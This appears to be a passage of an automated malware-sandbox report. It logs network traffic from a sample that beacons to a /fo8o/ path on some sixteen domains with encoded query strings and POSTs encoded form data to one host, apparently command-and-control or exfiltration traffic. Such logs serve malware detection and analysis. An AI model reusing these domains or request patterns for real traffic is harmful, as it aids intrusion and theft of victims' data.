    GET /fo8o/?blWd=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYS1O+KnDGu0Ee7a9fQq7JRnHJ6pn6i4sEdb7G20jo8euDHkgubc=&Ixe=Apq4tPPXNdTp2 HTTP/1.1
  Host: www.joyesi.xyz
    GET /fo8o/?Ixe=Apq4tPPXNdTp2&blWd=4jpq/azRsxa5RUjY86tNWfjSBjUfGmQA/bC5edk8IUrTRSqWoRPa/8wzulAZuqVnvDzKNkDL1IzsWztH+C0v0tvbjYVZrXx7xEZksJc7712LnlYWiWRTV2JAY9clvZ1jJotY128= HTTP/1.1
            Source: global trafficHTTP traffic detected: GET /fo8o/?Ixe=Apq4tPPXNdTp2&blWd=CKPof6WmPR8MjyGgZoDlhb60KxQVVSuHH5TS1bRPLOh5omNg/qt+/6bvCL2pthCxfTLrkj/U4P5Lt/hzCRdBTD8WClZdEhsa3dPrDeE1SdlnJbrG6MsWCo/sylvA1Bg/24QA05c= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.shenzhoucui.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?blWd=AU3XYvZFaGSlytwuLg8MPaUQqx3yoZo+slWhncsJrkz7OmZN7i/xsh6l91syvPfChHr514cSZiYi12sQUpLBNWUGgXkiv5tYdsczWAt3YIqQCRozzWbYSNnfkFwi3fxcOtzIASs=&Ixe=Apq4tPPXNdTp2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.b301.spaceConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?Ixe=Apq4tPPXNdTp2&blWd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnyIi7V/S5J9AzlXPHqpluzE36hxZsh30r8poflPmNwlfmk35jvL8= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.3xfootball.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global traffic | DNS traffic detected: DNS query: www.3xfootball.com
            Source: global traffic | DNS traffic detected: DNS query: www.kasegitai.tokyo
            Source: global traffic | DNS traffic detected: DNS query: www.goldenjade-travel.com
            Source: global traffic | DNS traffic detected: DNS query: www.antonio-vivaldi.mobi
            Source: global traffic | DNS traffic detected: DNS query: www.magmadokum.com
            Source: global traffic | DNS traffic detected: DNS query: www.rssnewscast.com
            Source: global traffic | DNS traffic detected: DNS query: www.liangyuen528.com
            Source: global traffic | DNS traffic detected: DNS query: www.techchains.info
            Source: global traffic | DNS traffic detected: DNS query: www.elettrosistemista.zip
            Source: global traffic | DNS traffic detected: DNS query: www.donnavariedades.com
            Source: global traffic | DNS traffic detected: DNS query: www.660danm.top
            Source: global traffic | DNS traffic detected: DNS query: www.empowermedeco.com
            Source: global traffic | DNS traffic detected: DNS query: www.joyesi.xyz
            Source: global traffic | DNS traffic detected: DNS query: www.k9vyp11no3.cfd
            Source: global traffic | DNS traffic detected: DNS query: www.shenzhoucui.com
            Source: global traffic | DNS traffic detected: DNS query: www.b301.space
            Source: unknownHTTP traffic detected: POST /fo8o/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.kasegitai.tokyoOrigin: http://www.kasegitai.tokyoCache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 209Referer: http://www.kasegitai.tokyo/fo8o/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)Data Raw: 62 6c 57 64 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 4a 5a 76 70 77 56 49 68 75 42 43 58 53 48 62 6c 32 71 6c 5a 2b 79 49 57 5a 2b 61 46 2f 2f 42 72 6b 77 51 5a 6d 6c 71 64 38 54 35 32 76 54 57 45 67 77 41 56 68 42 38 69 6e 33 6f 45 74 35 2f 53 55 34 79 6d 76 43 4e 39 73 66 79 73 79 67 68 45 77 5a 4f 31 47 62 49 4d 4c 67 45 53 42 69 78 58 65 77 45 46 2f 33 64 62 2b 4f 4f 6c 58 45 70 6a 39 6f 58 75 59 57 54 43 67 42 68 32 50 37 39 7a 47 73 76 43 58 68 7a 62 50 30 42 39 74 70 48 4a 50 4e 6d 66 66 33 4f 6a 34 68 39 38 78 6f 45 48 42 33 45 74 49 7a 2f 63 65 67 36 4e 67 68 4d 58 57 72 64 61 4a 39 74 62 66 31 64 53 36 4e 39 38 Data Ascii: blWd=5JlKLzaKVp1wJZvpwVIhuBCXSHbl2qlZ+yIWZ+aF//BrkwQZmlqd8T52vTWEgwAVhB8in3oEt5/SU4ymvCN9sfysyghEwZO1GbIMLgESBixXewEF/3db+OOlXEpj9oXuYWTCgBh2P79zGsvCXhzbP0B9tpHJPNmff3Oj4h98xoEHB3EtIz/ceg6NghMXWrdaJ9tbf1dS6N98
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Fri, 02 Aug 2024 11:51:21 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Fri, 02 Aug 2024 11:51:25 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Fri, 02 Aug 2024 11:51:27 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Fri, 02 Aug 2024 11:51:30 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Fri, 02 Aug 2024 11:51:36 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 
Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Fri, 02 Aug 2024 11:51:38 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 
Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Fri, 02 Aug 2024 11:51:41 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 
Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Fri, 02 Aug 2024 11:51:43 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 
Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 02 Aug 2024 11:51:49 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-08-02T11:51:54.7200281Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 02 Aug 2024 11:51:52 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 18X-Rate-Limit-Reset: 2024-08-02T11:51:54.7200281Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 02 Aug 2024 11:51:54 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-08-02T11:51:59.7899409Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 02 Aug 2024 11:51:57 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-08-02T11:52:02.2922594Z
